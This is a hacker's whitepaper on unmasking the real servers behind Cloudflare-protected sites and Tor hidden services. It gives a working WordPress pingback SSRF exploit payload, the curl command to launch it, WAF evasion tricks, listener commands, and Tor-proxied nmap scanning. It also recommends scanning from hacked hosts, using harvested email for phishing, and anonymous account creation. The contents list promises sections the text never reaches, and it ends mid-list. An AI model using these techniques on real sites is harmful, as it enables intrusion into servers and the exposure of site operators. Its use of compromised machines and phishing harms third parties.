This is a whitepaper that discusses unmasking hidden sites behind Cloudflare and Tor.
55b41d984f3de143bc1ab3d75c2bfb2181b35277644bc2e08ecee6160697f930
[[ Whitepaper on unmasking Cloudflare and Tor hidden services - v1.0.1 ]]
Introduction / FAQ
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
- How long will this guide be useful for?
- What about Windows?
- What are the chances of success?
- What do I do (about hacking a site) if I can't unmask the site?
- How to use nmap or other tools on a tor site
- Cloudflare unmasking hacks that don't work anymore
General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
- Wordpress's Built In SSRF
- Uploading Avatars on Forums, and Similar Common SSRFs
- Other stuff that probably connects out
- More tools
Email
- It's not hard to get most normal websites to email you
- Ask people to email you
DNS records
- MX records
- MX records that might sort of point in the general direction
- Using search engines and databases to find the real ip addresses of websites
- DNS History sites
- Brute forcing subdomains
Searching for sites based on hunches as to where they might be located
- It's kind of like using a pirate map
- Bulletproof webhosts
- Hosting companies known for hosting drug related content
- Brute forcing vhosts (and why it's a dead end)
Mapping the site structure
- Javascript files
- APIs
- Status Pages and Similar Mistakes
- Other loot
Appendix: Misc exploits, misconfigurations and tools
- Wordpress upload directory and CDNs
- changelog.txt
- Google Image Search
- Burp Collaborator Everywhere plugin
- XML input forms
- SSRF exploits that work via file conversion utilities
- Indexes to two frequently mentioned papers
- Google dorking for stuff
- Misc networking attacks
- End User Attacks
- DoS attacks
[[[ Introduction / FAQ ]]]
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
Cloudflare is an anti denial of service company that works by actually hiding the website. Requests to the website hit Cloudflare's servers first, which decide based on your ip and browser whether or not to pass you through to the site. The servers are a kind of reverse proxy (look it up if you've never heard of one). As an added benefit they also cache static website pages and have an optional WAF that's fairly bad but will still interfere with your scanners. Most importantly, each ip address is only allowed to make around 23,000 requests per day.
You've seen cloudflare protected sites before. If you use Tor Browser to browse the normal internet you'll notice lots of sites with orange cones that want you to identify all the traffic lights in a picture. That's a cloudflare reverse proxy deciding if you're a bot. If you're trying to hack the site, all the proxies in the way get annoying.
A tor hidden service is a .onion site. There are a lot of really well thought out hidden services and this guide really won't help you that much with them. There's also a lot of really shitty vendor sites, scammers, and collections of complete weirdos that have much worse security. The biggest challenges with tor sites are that they rarely run cryptographic services you can fingerprint (SSL, SSH), don't have any DNS you can use, and usually have captchas everywhere.
Some of the additional challenges involved in finding tor sites: it's harder to verify whether you've found the correct server, there are no DNS records, and they frequently have other annoyances like lots of captchas and a generally higher level of security. On the brighter side you can port scan tor hidden sites - with cloudflare protected sites you're limited to connecting to https until you figure out where the site is actually located.
- How long will this guide be useful for?
The two best ways of unmasking hidden sites have stopped working in the last couple of years: SSL search engines, and a DNS hack that used to work nearly 100% of the time (http://www.crimeflare.org:82/cfs.html). Unfortunately Cloudflare seems to have fixed these issues and is taking some half assed steps towards making sites slightly less identifiable by their SSL certificates.
I've organized this document from the most to the least commonly vulnerable type of attack. Techniques at the bottom can still work once in a while, and anyway some of the people reading this will have more success with some of the attacks than I have. It just always works that way. Some of the exploits in this paper have been tested and quite a few more have not (at least not yet).
Unfortunately a lot of the URLs will break, as that is the nature of URLs. Try googling for the paper name (if it's missing) and you'll probably find it. One site listed is really useful and potentially irreplaceable, but that's about it.
- What about Windows?
All the example commands here use Linux. Many of them (like nmap) undoubtedly work on Windows. Just use Linux, and if you're trying to figure out a distribution and you like hacking stuff try Kali Linux. It's a fairly recent version of Debian stuffed full of fully functional hacking tools, which is useful.
- What are the chances of success?
Idk. On any specific site it really depends on the technical skill and attention to detail of the people running the site and how much they care about being unmasked. It's not a bad idea to find a giant collection of sites that you wouldn't mind unmasking and try some of these attacks on one after another - it'll go way faster than doing them one at a time.
- What do I do (about hacking a site) if I can't unmask the site?
If you want to launch hacks on some site and can't unmask it, you can still attack them through the cloudflare reverse proxy. Their proxies aren't that smart and only throw captchas at Tor users. Their WAF is not hard to get around, and it also gives you a 403 error code with the cloudflare branding so you know exactly when it's the problem.
Cloudflare has a max number of requests per ip, and since you can't use tor, that can really slow things down a bit. I notice I can usually get around 22-23k requests per ip before getting blocked for the day.
If you search reddit.com/r/netsec some people have clever rotating proxy arrangements that involve automatically setting up hosts in AWS. This will get your AWS account banned pretty quickly, but in the mean time you're fine. I'm not that elite, so I usually just launch scans from a few different hacked hosts. There's always at least 10 morons online who're root-able if you just scan for an exploit you know works.
- How to use nmap or other tools on a tor site
Cloudflare protected sites will only allow access to https via their url. Tor hidden services allow for nearly any sort of TCP connection, so if you combine a tool like proxychains4 (aka proxychains-ng, it's just called proxychains4 in the Kali Linux repo) with anything that does normal non-raw connections to a site, you can port scan, directory brute force, etc over the socks proxy that comes with the standard tor daemon.
When using nmap you have to be careful not to do anything that requires raw sockets (so no -sS or -O); running it as a non-root user takes care of that. -sT = TCP connect scan, -sV = version detection, and most importantly -sC runs the default set of nmap's lua (NSE) scripts. Many of the scripts that come with nmap are for gathering information, so I'd really recommend trying them out.
Proxychains without the -q flag will tell you "socket error or timeout" for every closed port, but it's nice to be able to check that it's working. The .onion site will show up with a fake DNS resolution of 224.0.0.1.
Nmap example:
proxychains4 -q nmap -Pn -sT -sV -sC -F -T4 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion
The ip address should come up as 224.0.0.1, and if you omit -q from proxychains it'll tell you it timed out for every single closed port. I use -F when scanning tor sites because I'm impatient and I'm not sure tor will pass a port like 23153 through anyway. I read some tor specification and I swear it said that tor doesn't actually use TCP port numbers. Anyway, don't take my word for it - to scan every possible port use -p- instead of -F.
What you'd like to find are: encrypted services that can be fingerprinted like https, ssh, smtps, etc (if it's encrypted it should involve a unique key), and banners that reveal other hostnames or ip addresses (it'd be nice if more people ran SMTP on the darknet). Usually you just find an http port and not a lot else. You can do the exact same thing with proxychains4 and netcat and most other hacking tools that work over tcp.
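If you just want to poke at a single port instead of running a whole nmap scan, ncat over proxychains works fine too. A minimal sketch (the .onion address is a placeholder, and the tor daemon's socks proxy is assumed to be on its default port 9050):
proxychains4 -q ncat xxxxxxxxxxxxxxxx.onion 80
proxychains4 -q ncat --ssl xxxxxxxxxxxxxxxx.onion 443
echo | proxychains4 -q openssl s_client -connect xxxxxxxxxxxxxxxx.onion:443
The first two give you an interactive connection (type HEAD / HTTP/1.0 and hit enter twice to get a banner), the last one dumps whatever certificate the port presents.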
- Cloudflare Unmasking Hacks That Don't Work Anymore
There are tons of obsolete ways of discovering what's behind a cloudflare hidden website. The best was http://crimeflare.org:82/cfs.html - if you stuck in the domain of a cloudflare protected site it would use some DNS hack against Cloudflare's dns servers that would give you the real ip address almost every time. Those were the days *sigh*. You can still occasionally use it to find other sites that are associated with the same cloudflare account as the target site (discussed later).
Another hack was looking up the site's ssl fingerprint using SSL search engines. Nowadays cloudflare makes its own SSL certificates, so you basically never run into a situation where the exact same SSL certificate is used by the cloudflare reverse proxy and the real website. Variations on this hack are still kind of useful (you can search for serial numbers and the FQDN of the site). Overall SSL certificates are really far from the automatic win they used to be. On top of that, the best places to search for SSL fingerprints are not that useful these days either, with amazingly outdated information or never having the site that you're looking for.
I'm going to go into this in more detail later despite it not being that effective anymore, and I'll include the syntax to search via Shodan.
--== General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
An SSRF is a type of web exploit - it's when you trick a remote server into connecting out so you can grab its ip address (in this case). Any time a server makes an http(s) request out and you can control the destination, it's an SSRF. They're good for a lot more than that - look up Erratic's Capital One hack if you're interested in seeing what an insecure image upload/download form did to a bank.
SSRFs are well worth looking for, and I'd say these days they're my number one or two way of identifying the real ip address of websites. They work on both Cloudflare protected sites and Tor hidden services, although Tor hidden services are often run on servers that are specifically configured never to make outbound connections (around half the time for non-Impedya vendor sites).
- Wordpress's Built In SSRF
Wordpress has an API with a pingback feature that can be used to force any wordpress site with it enabled to connect out, assuming that a number of conditions are met. There are a lot of vendor sites that use Wordpress. The biggest deal breaker is that the blog owner must have at least one normal blog post that they've made themselves. They also must have an accessible xmlrpc.php file (the one that says "XML-RPC server accepts POST requests only."). Cloudflare's WAF actually blocks pingback requests to the API, however there's at least one really obvious way of reformatting the request so it's not blocked, which I'll share here.
Conditions (there's a quick curl sketch for checking the first two right after this list):
- To check if a site is running wordpress visit https://sitehere.com/readme.html - sometimes this file is removed
- The url https://sitehere.com/xmlrpc.php needs to say something about only accepting POST requests when visited.
- The blog owner must have made two blog posts or pages. Usually people make a lot of them. You want ones with simple urls like site-here.com/about-us or site-here.com/contact-us. Wordpress still supports urls like ?p=XXX where XXX is a number above 2 or 3, but you can't use those urls in the exploit - only use them to find pages on the site.
- It must be possible for the server to make an outgoing connection. Many tor hidden sites disable this in various ways. The server might need libcurl installed as well, which is common but not ubiquitous.
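Before bothering with the full exploit, you can sanity check the first two conditions with curl. A rough sketch (stick proxychains4 in front of curl for an onion address):
curl -sk https://target-site-here/readme.html | grep -i wordpress
curl -sk https://target-site-here/xmlrpc.php
The second request should come back with the "XML-RPC server accepts POST requests only." message if the file is reachable.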
All this exploit does is take the known wordpress pingback SSRF, which uses an API method called pingback.ping, and reformat it as a system.multicall api call. If this exploit ever gets blocked by Cloudflare, their WAF is such a PoS that there are probably plenty of other ways of getting around it (for example some versions of Wordpress seem happy with slight variations on the "pingback.ping" method name, and their xml parsing library ignores up to 200 characters of <!DOCTYPE ...> at the start). Webmasters sometimes block the xmlrpc.php file since it can be used to brute force passwords. If you're using Wordpress to run a hidden site a) you probably shouldn't and b) you should completely remove or block this file.
Alternate potential evasions if the one below stops working:
Minor variations on the "pingback.ping" method name (some versions of Wordpress aren't picky about exactly how it's written)
<!DOCTYPE note []>
Add the DOCTYPE stuff right before the first <methodCall>. Wordpress or php filters this out to prevent XXE attacks (discussed later), which is nice because you can use it to add up to an extra 200 characters to the beginning of the xml POST request.
<!DOCTYPE AAAAAAAAAAAAetc []>
The word note can be replaced with any string 189 characters or shorter
Actual exploit for hidden sites (.com, .onion, etc)
Edit http://youripaddresshere/ to your listener's url, and the two https://target-site-here/... urls to two different blog posts or pages on the hidden site.
------------- request.txt -------------
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/blog-post-one</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/a-different-wordpress-page</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>
---------------------------------------
Run _any_ of these commands as root to bind to port 80 and listen for a connection.
Example listener command #1: nc -v -v -l -p 80
Example listener command #2: ncat -v -v -l 80
Example listener command #3: cd /dev/shm ; python3 -m http.server 80 (or "python -m SimpleHTTPServer 80" on old python2 boxes)
Launch the exploit with this curl command. Curl is not always installed by default.
Run the exploit:
curl -k -i -X POST https://target-site-here/xmlrpc.php -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@request.txt"
Run the exploit against a tor site:
Same deal but start with "proxychains4 curl"
If Wordpress accepts the API request successfully then you should see "<name>faultCode</name><value><int>0</int>" in two places in the output. If nothing is stopping Wordpress from connecting out, you'll see the ip address of the server connect to your listener. Some versions of Wordpress have some kind of rate limiting for pingback.ping, so try to get the exploit right in the first few tries. Another cool thing about this exploit is that if your request went through a non-cloudflare proxy or load balancer, that machine will sometimes show up as the originator of the request when you get the callback.
- Uploading Avatars on Forums, and Similar Common SSRFs
If you're trying to unmask a website that lets you sign up, do so immediately and give it a valid email address. A convenient site is http://mailinator.com - it'll let you use a throwaway email address and will show you the sending ip address in the message headers. Some forums will let you upload a picture for your avatar, and some of those will let you give it the URL of a remote image and will actually go and download the file, exposing the ip address of the server in the process.
Any exploitable RFI can also be used like an SSRF and will give you the server's ip. If you can't get the avatar to load from your website, try looking for any sort of file, document, image, or pdf upload form. Upload forms are a frequent source of vulnerabilities in web apps so it's a good idea to spend time screwing with them anyway. You should stick your url into literally any form field on the site that says it expects a URL, and if you want to be thorough, anywhere that expects a URL or a filename (which has a very slim but non-zero chance of working). It's a long shot, but why not? Even if remote fopen is disabled, all sorts of things have libraries like curl built in that are capable of making http requests.
I wrote down a few different commands for easily listening to an ip address under the Wordpress SSRF exploit. If you're not sure if the world can reach your port and ip address, try using a website that will run nmap (there's lots of them).
- Other stuff that probably connects out
There's other things that'll connect out on the average website. Plugin updates, anything email related, cronjobs, forms that accept xml input and are vulnerable to XXE attacks, plugins that were written by idiots, some image conversion libraries (read https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html), document conversion software, PDF readers, and much more.
Overall SSRFs are either the #1 or #2 most reliable way to find a website's real ip address. #3 is probably MX (email server) DNS records, and #2 is probably getting the site to email you. After I discuss those I go into stuff that rarely works, at length.
- More tools
Onionscan runs an automated list of checks against a tor site in order to find data about it. It tries to fingerprint the site in various ways and checks for status pages, open folders, and images that still have exif data. One trick Onionscan uses is just connecting to http(s)://target-site-here/server-status to see if the Apache server-status page is enabled for everyone. The Nginx equivalent is http(s)://target-site-here/status . Neither is usually enabled for non-localhost connections, but if it is it'll show things like how many people are connected to the server. There are some other site-exposing urls listed under "Status Pages and Similar Mistakes."
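If you'd rather do those two checks by hand than run Onionscan, a quick sketch (the onion address is a placeholder):
proxychains4 -q curl -s -o /dev/null -w "%{http_code}\n" http://xxxxxxxxxxxxxxxx.onion/server-status
proxychains4 -q curl -s -o /dev/null -w "%{http_code}\n" http://xxxxxxxxxxxxxxxx.onion/status
Anything other than a 403 or 404 coming back is worth pulling up in a browser.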
Burp Proxy (Professional) will not find the site for you, but it's a big help. When you use it in proxy mode, it keeps track of all the *other* sites the main site loads files from. You can use this to find subdomains, CDNs, and javascript files (which you can then go through for more URLs), and just to get a really good picture of the site's structure. Directory brute forcing tools like wfuzz, dirb, etc only show you files and urls that are on the main site. Burp can be configured to use tor for outgoing connections in its options panel - just set it to use SOCKS5 on port 9050 and have it use the proxy for dns resolution.
I always brute force directories and files. Dirb is the easiest tool to use, but I take the wordlists from DirBuster (which is entertaining to watch but rarely does a good job). It takes a very long time to go through a list of directories that long. I'll go into it more when I'm discussing less successful attacks.
--== Email
- It's not hard to get most normal websites to email you
Email is yet another way websites connect out, so it's yet another way that badly run sites will leak ip address information. Sometimes just signing up for an account is enough - look for any place that lets you register on the site and hopefully you'll get an email telling you that your account is active. If you can't set up an account, look for a lost password link. Some lost password links will send you an email even if you don't have an account.
It's really uncommon these days but you should double check that contact forms don't submit an email address when you use them. If you search your Burp proxy history for @ you'll probably notice this.
If it helps, most email contact forms at some point use the venerable sendmail command line client (which isn't the same as the daemon of the same name). It's kind of a standardized utility, so if you're trying to figure out what parameters to inject into a mailer, look at its man page. The old PHPMailer exploit could definitely be used to redirect email to yourself, but it's an ancient exploit.
If you haven't tried searching Google, Bing, and Yandex for email addresses that you've found you probably should. Just in general if you find other sites that appear to be associated with the one you're looking at you should try to track down their location as well since there's a good chance that they're hosted on the same machine.
Email shouldn't work on any tor hidden server set up by anyone with half a brain. In fact DNS, which is needed for email, shouldn't even be enabled on any server that really wants to stay hidden (which is a massive hassle).
- Ask people to email you
If your target is a normal business of some sort, ask them for marketing information or help with something, then examine the full headers from the email they send you. As a plus you can use this email to make phishing email look legitimate.
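Once you get a reply, save the raw message (most mail clients call it "show original" or "view source") and pull out the interesting headers. A rough sketch, assuming you saved it as message.eml:
grep -iE '^(Received|X-Originating-IP|X-Mailer):' message.eml
Received headers get stacked on top as the mail passes through each hop, so the bottom one is the machine closest to whatever actually generated the message.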
--== DNS records
There are a couple of ways you can potentially unmask a cloudflare protected site using DNS. DNS attacks will not work on onion sites. The most common mistake is that people are kind of morons about their MX (mail exchange) records. The other is that by brute forcing subdomains, alternate TLDs, and so on, you can frequently find other sites associated with your target. Sometimes the other sites are even on the same server, and it's not hard to check.
- MX records
An MX record is how smtp servers know exactly where they're supposed to connect in order to send mail to a domain. A surprisingly large amount of the time it points directly at the hidden site (maybe around 10%). Even if it doesn't point at the site, it's really common for email to be hosted by the same company the site is getting its web hosting from, which opens up a lot of scanning related possibilities. That's because it's a giant pain in the ass to run your own mail server. Remember that subdomains (including www) almost never have MX records, so if you can't find one try taking the front off the url.
Example 1:
$ host -t MX www.xxxxxxxxxxxxxxx.net
www.xxxxxxxxxxxxxxx.net has no MX record
$ host -t MX xxxxxxxxxxxxxxx.net
xxxxxxxxxxxxxxx.net mail is handled by 0 dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net.
$ host dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net
dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net has address 82.221.131.63
Hm so 82.221.131.63 is their mail server. If you visit https://82.221.131.63 you'll get an SSL error message about a bad certificate, because it's actually for xxxxxxxxxxxxxxx.net. I figure it's ok to use them as an example since they've obviously put 0 effort into hiding their site, and I'm way too cheap to spend $100 to see if the avatar SSRF will work on them.
You can use the openssl s_client utility or the version of ncat that comes with recent versions of nmap to communicate with SSL encrypted ports. Since these days the main ip address might have a different SSL certificate than another website on the server, it's a good idea to check with the openssl client.
echo | openssl s_client -connect 82.221.131.63:443
echo | openssl s_client -connect 82.221.131.63:443 -servername correctsitename.net
If you look through the output you'll see the subject of the SSL certificate is xxxxxxxxxxxxxxx.net. I'll go into SSL in more detail later, but it's one of a few good ways of verifying whether or not a site is the target site. You can do this way easier with nmap:
root# nmap -PS443 -p443 -sT --script=ssl-cert 82.221.131.63
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-26 23:14 MST
Nmap scan report for xxxxxxxxxxxxxxx.net (82.221.131.63)
Host is up (0.30s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-cert: Subject: commonName=xxxxxxxxxxxxxxx.net
| Subject Alternative Name: DNS:xxxxxxxxxxxxxxx.net, DNS:cpanel.xxxxxxxxxxxxxxx.net, DNS:cpcalendars.xxxxxxxxxxxxxxx.net, DNS:cpcontacts.xxxxxxxxxxxxxxx.net, DNS:mail.xxxxxxxxxxxxxxx.net, DNS:webdisk.xxxxxxxxxxxxxxx.net, DNS:webmail.xxxxxxxxxxxxxxx.net, DNS:www.xxxxxxxxxxxxxxx.net
| Not valid before: 2020-10-17T00:00:00
|_Not valid after: 2021-01-15T23:59:59
There's something really important I need to point out. Did you see that in the openssl commands I specified a field called -servername? SSL sites these days are like http sites in that you can have more than one using the same ip address. The servername is like a vhost for https (the official term is SNI). You can alter that nmap command to look for a single servername. Keep in mind it has to be exactly right, so if the servername is "www.dumbsite.com" and you specify "dumbsite.com" it might miss it. Anyway...
How to do the same check with nmap including the servername:
nmap -PS443 -p443 -sT --script=ssl-cert --script-args="tls.servername=xxxxxxxxxxxxxxx.net" 82.221.131.63
If you're reading this to try to make your own site harder to find, you should (if possible) leave the site on plain http port 80 and absolutely never let it be the main/default site on the server. When someone visits your server by ip you want them to see a default "I just installed Nginx, what now?" page or something like that. Avoid https/SSL if possible.
- MX records that might sort of point in the general direction
The situation where the MX record points at the real mail server happens more than you'd expect, but sometimes it's simply pointing at a specific hosting company's mail server. That can still be useful information. Other times it points at things like bulk email services, which mostly exist to figure out how many people have seen a message and to appeal to the more legitimate sort of marketing people.
So don't get too carried away - always do a whois on the ip and make sure it would make sense for the site to be hosted there. Also remember that while it's really unusual, subdomains can have their own MX records. The only place you really see that is at colleges, so that each department can have its own mail server.
There's a section further down with information on doing scanning of ip ranges for websites you're looking for. I tried to organize this guide from likely to least likely to succeed so scanning for the site is down in the "unlikely to get anywhere but worth trying" section.
- Using search engines and databases to find the real ip addresses of websites
I'm going to be honest, this ALMOST NEVER WORKS ANYMORE. I may as well show you how to do it, though - maybe you'll get lucky where I generally don't. I never got it to succeed at all until I tried it on a large non-cloudflare-protected site that isn't hosted by a cloud provider, so I'm vaguely curious if cloudflare has a way of keeping things out of Shodan. Anyway, this used to be a fairly effective way of finding hidden sites, but cloudflare now makes its own SSL certificates for everyone and... who knows what else. That means you can't just visit a cloudflare protected site, grab a certificate fingerprint from your browser, and immediately stick it into a search engine to find the real ip of the server.
Fortunately SSL has other attributes and effectively can't be turned off for non-onion sites (tor has its own encryption so SSL isn't needed there). Some things you can still search for are the (real) certificate's serial number, its fingerprint if you have or can find it, and the CN (common name) and other dns names in the SSL cert. I think the serial number is almost as identifying as the SSL certificate's fingerprint. My access to every SSL certificate's serial number depends on https://crt.sh, which aggregates the Certificate Transparency logs that SSL certificate providers have to publish (look up Certificate Transparency if you're curious how it works), so hopefully it never goes away.
SSL related sites that are useful:
https://crt.sh - I've mentioned this site before. It keeps track of SSL certificates that show up in the industry standard Certificate Transparency logs. It's the best place to start by far, but it's not going to give you a fingerprint you can stick straight into another site. It's also a good source of subdomains that you're unlikely to guess.
So search crt.sh for your target site's name. You'll usually get a list of every SSL cert they've ever bought, including various fingerprints and the SSL serial number (which is a different thing). A bunch will be provisioned by Cloudflare. Letsencrypt is the free SSL certificate service, Comodo and Verisign are large commercial SSL certificate vendors, etc. You can try sticking the fingerprints and SSL serials into Shodan but it almost never works. I would say that it has never worked for me, but I got it working on a completely normal website while writing this document.
The nice thing about crt.sh is that, thanks to those logs, it has information on everyone's SSL certificates. You can see every single SSL certificate a site has ever purchased or had generated for it by any legitimate SSL provider. That's pretty heady stuff, and you can check the SSL certificates' serial numbers against target ips and things like that.
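crt.sh also has a json output mode that's handy for scripting. A sketch, assuming the output still includes the name_value and serial_number fields and that you have jq installed (%25 is just an url-encoded % wildcard):
curl -s 'https://crt.sh/?q=%25.target-site-here.com&output=json' | jq -r '.[].name_value' | sort -u
curl -s 'https://crt.sh/?q=target-site-here.com&output=json' | jq -r '.[] | "\(.serial_number) \(.not_before) \(.issuer_name)"'
The first command dumps every hostname that has ever shown up in one of their certificates (a nice source of subdomains), the second lists serial numbers you can try feeding into Shodan.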
https://shodan.io - Don't get me wrong, Shodan is really cool. It scans many ports on the internet (including ssh/SSL) and lets you search through their results using a number of really useful attributes. The problem is I never find anything this way. I have some links to documentation at the bottom of this section. Most people use it to search for company names or for versions of software with known vulnerabilities.
I can find interesting stuff using it, but I can never find a cloudflare protected site's SSL certificate. I had actually given up on it until I tried a large normal public site and it found it immediately. I'm also not sure if they still scan the entire internet. One problem is they only index the SSL certificate that the site presents by default. With TLS you can have as many different SSL certificates as you have vhosts; the certificate is selected via a vhost-like piece of data called the "servername." Here's an example of how to search for SSL certificates using a major website that is *not* hidden.
Try the following searches - the ip address is generally 151.101.*.193:
ssl.cert.subject.cn:imgur.com
ssl.cert.fingerprint:f4346e0c345f9fd4b5ef1ccfa5e9c1671b652aa7 (the certificate's fingerprint - this example is a SHA1)
ssl.cert.serial:036b1f6c7d65d16539f32751d0d5eb2afb75 (not the same as the cryptographic fingerprint)
It's usually a good idea to try subdomains that you saw on crt.sh as well, not to mention just searching for the certificate's serial number.
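If you'd rather work from a terminal, Shodan has an official command line client. A sketch - it needs an API key from your account, and the filter searches generally require at least the cheap membership tier:
pip install shodan
shodan init YOUR_API_KEY_HERE
shodan search ssl.cert.subject.cn:imgur.com
shodan search ssl.cert.serial:036b1f6c7d65d16539f32751d0d5eb2afb75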
Reference material (searching with Shodan):
https://beta.shodan.io/search/filters - The official search reference
http://orkish5.tplinkdns.com/wp-content/uploads/2018/07/Shodan-Complete-Guide.pdf - Appendix E has an example (in json format) of data that's kept about SSL sites and certificates. Either it's out of date or they removed the part we need (ssl.cert.*). Ssl.dhparams.* is not the same, though I believe you can use it to see if there are additional sites with SSL certificates, just not what they are.
Other SSL related sites:
https://certdb.com https://censys.io https://spyse.com
CertDB (now Spyse.com) has incredibly outdated data, but it'll occasionally tell you where sites used to be hosted. If you click around enough it'll sometimes give you outdated ip addresses for a site or the names of hosting companies that used to be used. Any of them will do for this quick check. I don't know if Censys has improved since I last used it, but the free version was not up to date at all. It's still worth checking these sites since knowing about a hidden site's past is occasionally useful.
http://crimeflare.org:82/cfs.html - This site used to be a 90% successful way of finding the real ip of a website, but there's still something extremely useful you can do with it. If the website is using Cloudflare's DNS servers (which pretty much only marketing companies do these days) you can usually pull up a list of other sites served by the same DNS servers. For example, searching for "clickfunnels.com" and then clicking on the dns server name "jim ruth" takes you here: http://www.crimeflare.org:82/cgi-bin/domlist/_14056-jim-ruth - a huge list of sites all of which are cloudflare protected and many of which are obviously operated by the same marketing company. I mainly use it when someone SMS spams my cellphone, but it can also give you a lot of hints about what company owns a website.
- DNS History sites
There are millions of them - try googling for them. Most of them want you to at least make an account, and a few want money. I've never found one that does exactly what I want, which is Internet Archive style ip address records for different periods of time. Most of the time, instead of a time-indexed set of DNS data (which would be nice), it's more like the output of Sublist3r and the other subdomain-finding tools.
The idea is that sometimes people start off as a non-protected site and later change their minds and purchase cloudflare, so the original DNS history may still point at a valid ip address for the website. Unfortunately I haven't found a site that does exactly that.
A few sites I've tried are more like DNS PI services; they won't really tell you exactly what you need, but they will have additional subdomains and ips you might not yet be aware of.
Links:
https://robtex.com/ - This site recently updated itself and is now my favorite. If you log in it has a dns history section with actually useful historic information.
https://dnsdumpster.com/
https://certdb.com/ - technically this is a horribly outdated list of ips/SSL certs, but if you want outdated dns information then it's not a bad place to check
https://reposhub.com/cpp/miscellaneous/codingo-microsubs.html - an extremely large list of DNS history sites.
https://pastebin.com/XFqdNxQb - Another large (and different/slightly worse) list of DNS history type sites
https://www.circl.lu/services/passive-dns - costs money, I haven't tried it, but it seems popular
Off topic links - ways of searching for other domains that also resolve to a specific ip address:
https://www.bing.com/search?q=ip%3a212.129.37.81 (replace with your own ip address)
https://www.robtex.com/ip-lookup/212.129.37.81 - now you have to sign in with Google to get the reverse-dns information (the important part). Any cheap android phone + prepaid sim card from 7-eleven or Walgreens will let you sign up for a new google account when you factory reset the phone. Just pay cash for everything.
"host 212.129.37.81" - bash command to do an rDNS lookup
"whois 212.129.37.81" - bash command to see who owns the netblock an ip is located in
- Brute forcing subdomains
It's a really common hacking tactic to brute force subdomains of a known main domain. Obviously this only works on Cloudflare protected sites, not onions. It's really easy to do and there are many, many tools that can do it. All you really need is a good wordlist of subdomain names. The basic idea is that if you can find a subdomain that's either not hidden or badly hidden, you can use that subdomain to try to locate your main target.
To brute force subdomains I use a combination of the hostnames.txt file that comes with recon-ng and subdomains-top1million-110000.txt from https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS. Out of the tools listed below I actually use the bash for loops. They only make one request at a time, and it's immediately obvious when things aren't working correctly. Don't forget to also do a host -t ALL on all your discovered sites to make sure you didn't miss any weird record types like TXT or HINFO (a deprecated dns record type), and the authoritative NS servers can generally also be used to brute force subdomains. The bash command to find the authoritative dns servers is "host -t NS sitename.com"
You should really edit your /etc/resolv.conf to use a public nameserver like 4.2.2.1 or 8.8.8.8. Some tools like sublist3r will use a list of open dns servers instead. Home ISPs sometimes redirect your nonexistent dns requests to a web page filled with ads, and public nameservers sometimes won't let you make more than a certain number of requests. If you just stop finding things then the dns server you're using is probably blocking your requests, but you can check with "tcpdump -nn -i eth0 -c 100000 -v -v -A port 53". Some DNS servers also don't like getting too many requests at once from a single ip. You should keep an eye out for subdomains with names like: test, stage, staging, <software name>, vpn, corporate, internal, cd, anything that seems numbered, etc.
Subdomains named staging, test, lab, or stage are places people test a site before uploading it to the main site. Sometimes they're restricted by source ip. If you can reach one, it's usually basically an ignored copy of the real site with lots of extra information in error messages. A subdomain named vpn is a good one since in the last 2 years at least 6+ VPN exploits have been released to the public. Corporate or internal subdomains can be stuff like file sharing servers or SharePoint, but I'm getting off topic.
There are some tools that you can load subdomain wordlists into. The top one, Sublist3r, also searches several websites for the url you're looking for. The out of date SSL certificate sites listed further down can still provide the names of subdomains that you might not otherwise find. Recon-ng probably isn't the best tool for this but works reasonably well. In the list of bash commands I included a command that you can use to combine wordlists and remove duplicate entries. There are also tools that can do unrestricted bing/google/yahoo searches, but I generally don't use them because you need to buy (request?) API keys for the various search engines.
Tools:
Sublist3r - automated database recon and dns brute forcing. You can give it a list of dns servers so it'll spread the queries out and avoid triggering things intended to prevent dns from being used as a DoS amplification attack.
recon-ng - interface is slightly annoying, but it comes with a decent wordlist. It does a lot more than dns brute forcing if you set up the other features.
altdns - this one is sort of a bitch to get working. Its main thing is that it'll mutate known subdomains to find even more subdomains, like mail -> mail01 and 01mail, etc.
amass - almost the same as Sublist3r except written in Go, and it uses different sets of search engines. It's in the Kali Linux repo, and it's really a pain to use.
... and way more! There's tons of them.
Wordlists:
https://github.com/lanmaster53/recon-ng/archive/v4.9.6.tar.gz - hostnames.txt from recon-ng/data, it's a very good list and it's exactly the right size, but go add these missing subdomains: share, zendesk, ticket, tickets, nfs, external01, external-01, external1 (etc), storage01, windows2008, windows2010, nas01, file-server, asa, asafw, cron, solarwinds, backoffice
https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS - This site is awesome
https://wordlists.assetnote.io/ - this I just got from reddit today, and has more amazing wordlists. Good wordlists make a HUGE difference.
Useful bash commands for dealing with text data:
Organize and remove duplicates - "cat wordlist1.txt wordlist2.txt wordlist3.txt | sort | uniq > wordlist-all.txt"
- Do NOT redirect your output to a file that's also used for input - you'll delete the file! "cat file | sort > file" will end with "file" being more or less empty.
